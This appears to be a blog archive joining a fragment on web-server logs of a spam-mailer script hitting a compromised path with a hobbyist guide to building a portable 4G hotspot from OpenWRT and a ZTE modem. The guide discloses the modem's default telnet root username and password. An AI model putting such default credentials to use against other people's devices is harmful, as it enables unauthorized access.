192.145.239.8 - - [25/Jul/2014:03:47:31 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1673 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:47:50 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:48:01 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2142 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:48:31 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

Why some of these are getting 500s, i’m not sure… It could be the server’s load or a problem in the i59 script itself… Either way it was filling up mailqueue with annoying filth.

UPDATE: The 500’s seem to be caused by me setting restrictive facls on the postfix binary, lol!

[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied

Trololololololololol

All communications of i59 are done with the same User-Agent: "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

This is where I draw the parallel to Rodecap. I’m unsure what these IPs are, if they’re compromised machines or what. But they supply the spam in encrypted payloads.

balls… will have to find a format that gist doesn’t shit its pants over…

Project AWACS

Project AWACS

E3 Sentry AWACS (image from Wikipedia)

I had a requirement for 4G on the go that doesn’t cost me $40,000,000 a year to run… Telstra’s Voice and Data Pre-Paid sucks for price.

I wanted something I could use on the way to and from work, and whenever I was out. Something that was low-power and could sit in my bag.

UPDATE I fixed the issue where the usb modem would not show itself as an interface at boot, check the end of the post to find the fix!

Why AWACS?

I have massive planespergers… From wikipedia:

AWACS or Airborne Warning and Control System is an airborne radar picket system designed to detect aircraft, ships and vehicles at long ranges and perform control and command of the battle space in an air engagement by directing fighter and attack aircraft strikes.

I usually name my Wireless stuff after Airforce related things, Such as TACAMO (TAke COmmand And Move Out – Nuclear war survivable communications) for my Mobile Phone tether, and Callsigns for static Access Points, such as “Mainsail” and “Skyking”

The Setup:

Hardware!

1x TP-Link TL-MR3020 Mobile Access Pointhttp://wiki.openwrt.org/toh/tp-link/tl-mr3020 – Atheros AR7240 MIPS Processor @ 400MHz – 32M RAM – 4M Flash (yes, very tight…) – 1x USB, 1x Mini-USB (for power input) – 1x 10/100 Ethernet (for un-fucking with ThinkPad)

1x ZTE MF823 LTE/UMTS USB Modemhttp://zte.com.au/telstra/MF823.htm – Has an ARMv7 SoC and runs a Linux Kernel as I found out. (Had root on it less than 10 minutes after it being delivered)

1x Mini-Gorilla Battery Pack. https://www.powertraveller.com/en/shop/portable-chargers/professional/minigorilla/

So, firstly, I needed to Install OpenWRT on the TP-Link, this was fairly straight forward with the trunk versions known as Barrier Breaker. TP-Link are bros that don’t dick you around in giving access to the hardware you own, so it was as simple as feeding it OpenWRT as a Firmware Upgrade via the Web Interface :)

Once installed, I opkg’d the niceties and requirements after getting it connected up to my work’s non-priveleged wireless :3

opkg update; opkg install ip kmod-usb-net kmod-usb-net-rndis kmod-usb-net-cdc-ether usbutils udev

This will get you the nice new IP tools, as well as all the kernel modules and software required to tether to the ZTE Modem (Which will present itself like an Ethernet Adaptor over USB)

Once Telstra was kind enough to deliver my USB Modem (ok, it wasn’t that bad) I registered it up, and put on 10G that will stay active for 90 days, none of this 30 day bullshit with voice and data. You pay more up-front, but it will last you.

Once all together, we tell the AP what to do:

Since we cannot fit a web interface or let alone luci on this bee’s dick of a flash storage, we need to use the OpenWRT CLI configuration utility uci

(Alternatively, you can edit shit directly in /etc/config/network)

uci set wireless.@wifi-iface[0]=wifi-iface
uci set wireless.@wifi-iface[0].device=radio1
uci set wireless.@wifi-iface[0].mode=ap
uci set wireless.@wifi-iface[0].network=wan
uci set wireless.@wifi-iface[0].key=<GOOD PASSPHRASE>
uci set wireless.@wifi-iface[0].ssid=<AN SSID> (i use AWACS)
uci set wireless.@wifi-iface[0].encryption=psk2+ccmp

once satisfied, commit changes.

uci commit

Following this will get your USB Tether up and going – http://wiki.openwrt.org/doc/howto/usb.tethering

the tl;dr:

uci del network.wan
uci set network.wan=interface
uci set network.wan.ifname=usb0
uci set network.wan.proto=dhcp
uci commit network

and

ifup wan

How does it go?

Overall, I’m very impressed how it has turned out. Even in a city like Sydney where the 2.4GHz spectrum is literally shitted with Access Points, the close-proximity and power output make this more of a Piconet. People sitting directly next to you or around you on a bus or train will be able to use this without packet loss.

Internet access is very reliable, at around Lunch Time in the Sydney CBD (Heavy use period) I got 21 Mbps down and 17 Mbps up on 4G/LTE.

I’ve now used it more than a few occasions (Two without modem, one with) and I still have not dropped a Bar of Energy on the Gorilla. This is one Power Efficient setup, let me tell you.

What did impress me was the ability to reach the USB Dongle’s management interfaces still.

The USB Dongle will by default make a network of 192.168.0.0/24, whereas OpenWRT will have 192.168.1.0/24, you can reach the modem still on 192.168.0.1

Protip:

The ZTE MF823 has Telnet open, here’s the creds:

USER: root
PASS: zte9x15

It has a pretty decent Busybox on it too.

Weird Quirks

Sometimes, the USB modem won’t show up unless you plug it in after the AP boots. If this happens, just do so and run ifup wan from a root shell on the AP, everything will take care of itself from there.

FIXED

The way to solve this is rather silly, but it does work:

For some reason, the rndis_host module is not loaded into /etc/modules-boot.d to fix this run:

ln -s /etc/modules.d/usb-net-rndis /etc/modules-boot.d/50-usb-net-rndis

Then in /etc/rc.local add the line /etc/init.d/usbmode restart

For some reason, the USB stuff has to be restarted when the Access Point comes online, this might be due to the fact that both the ZTE Modem and the AP power up at the same time, the AP might be ready before the ZTE modem is… This will refresh stuff and then your usb0 interface should pop online at boot!